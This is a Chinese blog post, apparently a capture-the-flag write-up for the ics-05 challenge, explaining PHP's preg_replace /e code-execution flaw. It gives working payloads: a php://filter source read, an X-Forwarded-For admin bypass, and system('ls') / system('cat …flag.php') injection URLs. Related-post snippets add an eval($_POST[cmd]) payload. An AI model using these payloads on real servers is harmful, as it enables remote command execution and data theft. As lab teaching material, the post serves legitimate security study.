PHP 5.5.9的 preg_replace()函数漏洞

最新推荐文章于 2024-04-13 22:29:18 发布
最新推荐文章于 2024-04-13 22:29:18 发布
阅读量1.1k 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53099802/article/details/124952009
版权
这篇博客讲述了如何利用preg_replace函数中的/e修饰符导致的PHP命令注入漏洞。通过构造特定URL参数,攻击者可以执行系统命令,例如查看目录(ls)、切换目录并列出文件(cd+ls-la),甚至读取敏感文件(如flag.php)。博主通过Burp Suite进行流量拦截和X-Forwarded-For头的添加,逐步展示了漏洞利用的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

preg_replace的基本语法:

$pattern中含有/e的后缀时会发生解析错误,会执行$replacement中含有的命令。

例:攻防世界ics-05

进入网页,发现云平台那个位置可以点击,点击后url出现一个参数

并且可以修改随意显示,改为index.php后显示ok

PHP的filter强制读取操作,

改page的值为page=php://filter/read=convert.base64-encode/resource=index.php

查看源代码,发现base64,解码后审计

就是说可通过伪装xxf来进入admin模式,回到开始的界面

打开burp,抓包并加上 X-Forwarded-For:127.0.0.1 如下

response后显示如下

再审计前面的代码

 

 这就是preg_replace漏洞的利用,传入的pat为要搜索的模式,可以是字符串或一个字符串数组,rep为被替换的字符,sub为要搜索替换的目标字符串或字符串数组。

构造url: index.php?pat=/bug/e&rep=system('ls')&sub=bug(传入的类型默认为string,不用加'')

在刷新时用burp抓包,添加XFF为127.0.0.1

观察到:

需要定位到dir那个文件,

构造:index.php?pat=/bug/e&rep=system('cd s3chahahaDir; ls -la')&sub=bug

cd是定位当前目录,ls是显示当前目录文件, -la显示隐藏文件

如下:

 发现flag目录,继续以相同的方法进入

构造:index.php?pat=/bug/e&rep=system('cd s3chahahaDir/flag; ls -la')&sub=bug

如下:

 cat该文件,在网页管理器中找到flag

构造: index.php?pat=/bug/e&rep=system('cat s3chahahaDir/flag/flag.php')&sub=bug

完毕

 

 

托物言志
关注
PHP5.5.9整数溢出漏洞
qq_53099802的博客
05-26 2983
php5.5.9整数溢出漏洞
攻防世界 web篇(二)
weixin_51387754的博客
09-09 559
夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
preg_replace漏洞
鱼开yk2的博客
10-09 503
函数原型: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索subject中匹配pattern(正则)的部分,以 replacement 进行替换。 参数说明: $pattern:要搜索的模式,可以是字符...
php preg_replace漏洞,preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞
weixin_30431137的博客
03-10 324
天融信阿尔法实验室 李喆这里拿cve-2016-5734讲讲preg_replace引发的命令执行漏洞漏洞在exploit-db上有利用脚本,经过测试没有问题。这里对这个漏洞进行一下回溯跟踪来解释下preg_replace这个正则替换函数带来的问题。0×01 漏洞触发原理preg_replace漏洞触发有两个前提:01:第一个参数需要e标识符,有了它可以执行第二个参数的命令02:第一个参数需要在...
preg_replace在java中_深入研究PHP中的preg_replace和代码执行
weixin_35756892的博客
02-19 248
前言本文将深入研究 preg_replace /e 模式下的代码执行问题,其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常多,相信看完本文,你一定会有所收获。下面是 七月火 和 l1nk3r 的分析结果。案例下面先看一个案例,思考如何利用此处的 preg_replace /e 模式,执行代码(可以先不看下文分析,自己思考出 payload 试试)。...
php preg_replace /e 模式 漏洞分析
quan9i的博客
04-15 4137
在做一道可以进行rce的相关题时,发现很多之前不知道的知识,并且感到这个漏洞很有意思,进行了简单分析,总结如下,希望能对师傅们有帮助
preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞
Jim的博客
09-06 764
漏洞利用思路:这个漏洞目前没法直接利用,因为有token限制,需要登陆抓到token,同时需要构造第三个参数保证和第一个参数匹配上,第一个参数可控,但是第三个参数是从数据库中取出的,所以只能提前插入到数据库中,然后再取出来,columnIndex是取出字段值的可控,所以第三个参数也可控了。 //$find = ’0/e’; //$fromsqldata = ’0/e’; //echo pre
XCTF Web 记录(第四天、第五天)
ximo的博客
03-04 282
题目ics-05mfw ics-05 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 所以打开后直接点击设备维护中心,查看网页源码: 发现一可疑之处。 尝试使用伪协议读取index.php的源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 得到base64加密的源码,解码得到(关键部分): <?php $page = $_GET[page]; if (isset($page)) {
攻防世界-web高手进阶区
zji
04-25 6965
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
preg_replace函数漏洞利用
BoJing6的博客
03-28 1314
26就是&,%20就是空格,为什么用&&是因为&&是先执行前面语句为true后再执行后面的,就是先进入目录再ls,而&则被认为是两个独立的部分。构造payload=?\S*=${@eval($_POST[cmd])}是一个正则表达式模式,用于匹配零个或多个非空白字符。再看ics-05这题首先用php伪协议读取源码以后。将匹配任何非空白字符的序列。利用preg_replace漏洞读取目录结构。利用php伪协议来读取文件内容。首先看ctf不过如此那个题。
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
03-11
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
preg_replace+/e漏洞
weixin_33946605的博客
11-20 704
    前天看剑心的一篇文章,也是preg_replace+/e漏洞,发现PHP漏洞和ASP的简直大不一样鸟,最近虽 然自己才开始学习PHP,但是由于强烈兴趣还是大胆的看了许多PHP漏洞分析文档,当然,很多地 方不理解。大虾教我 ^ ^ 来源:[url]http://www.xfocus.net/articles/200605/866.html[/url]创建时间:2006-05...
preg_replace漏洞e模式函数执行,2024年GitHub上那些优秀网络安全开源库总结
最新发布
2401_83974020的博客
04-13 776
​ 这里我自己的理解是,只要一个正则表达式被一个一个括号包围,那么它就将被存放到一个临时缓冲区中,并且,如果存在多个正则表达式被括号包围,那么,就会从左到右依次存放在这个临时缓冲区中,另外,这个临时缓冲区是从1号开始的,也就是说,在正则表达式中,\1有着自己的含义,也就是访问这个缓冲区的第一个表达式,而两个\也是因为一个\要对另一个\进行转义。​ 随后,成功执行了phpinfo()函数:​​ 这里就不多说了,关于这方面的内容可以去看PHP的文档:我们输入了phpinfo。
php preg_replace漏洞,phpwcms 'preg_replace()'多个远程PHP代码注入漏洞
weixin_27183235的博客
03-10 147
Examples:1. Lines 699-700 of ./include/inc_front/content.func.inc.php:-------------------------------------------------------------// list based navigation starting at given level$replace = 'nav_list_...
preg_replace漏洞e模式函数执行
qq_66013948的博客
03-09 1213
​ 这里我自己的理解是,只要一个正则表达式被一个一个括号包围,那么它就将被存放到一个临时缓冲区中,并且,如果存在多个正则表达式被括号包围,那么,就会从左到右依次存放在这个临时缓冲区中,另外,这个临时缓冲区是从1号开始的,也就是说,在正则表达式中,\1有着自己的含义,也就是访问这个缓冲区的第一个表达式,而两个\也是因为一个\要对另一个\进行转义。{1},这玩意能正常执行出来,由于我们没有给1赋值,他会给个警告,但是没问题,不影响我们的语句,所以这个时候我们的rce就实现了。,此时我们呢再执行这个。
[2012-4-10]ThinkPHP框架被爆任意代码执行漏洞preg_replace
weixin_33785972的博客
07-13 184
昨日(2012.04.09)ThinkPHP框架被爆出了一个php代码任意执行漏洞,黑客只需提交一段特殊的URL就可以在网站上执行恶意代码。 ThinkPHP作为国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架。不过大多数开发者和使用者并没有注意到本次漏洞的危害性,提醒:此漏洞是一个非常严重的问题,只要使用了thinkphp框架,就可以直接执行任意php代码,使用t...
preg_replace() /e代码执行漏洞
weixin_43749601的博客
01-30 5437
preg_replace() 函数函数执行一个正则表达式的搜索和替换。 语法 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 参数说明: $pattern: 要搜索的模式,可以是字符串或一个字符串数组。 $replacem
[BJDCTF2020]ZJCTF,不过如此--【Preg_Replace代码执行漏洞、正则表达式(详解)】
qq_43613772的博客
08-27 649
代码审计,发现要get传参text和file,而且text的内容包含I have a dream字段。flie为文件包含next.php. 构造payload: ?text=data://text/plain,I%20have%20a%20dream& file=php://filter/convert.base64-encode/resource=next.php base64解密得到next.php的源码: <?php $id = $_GET['id']; $_SESSION['id'
preg_replace /e模式下代码漏洞
sGanYu
10-17 1234
<?php error_reporting(0); $text = $_GET["text"];//以get方式提交text $file = $_GET["file"];//以get方式提交file if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值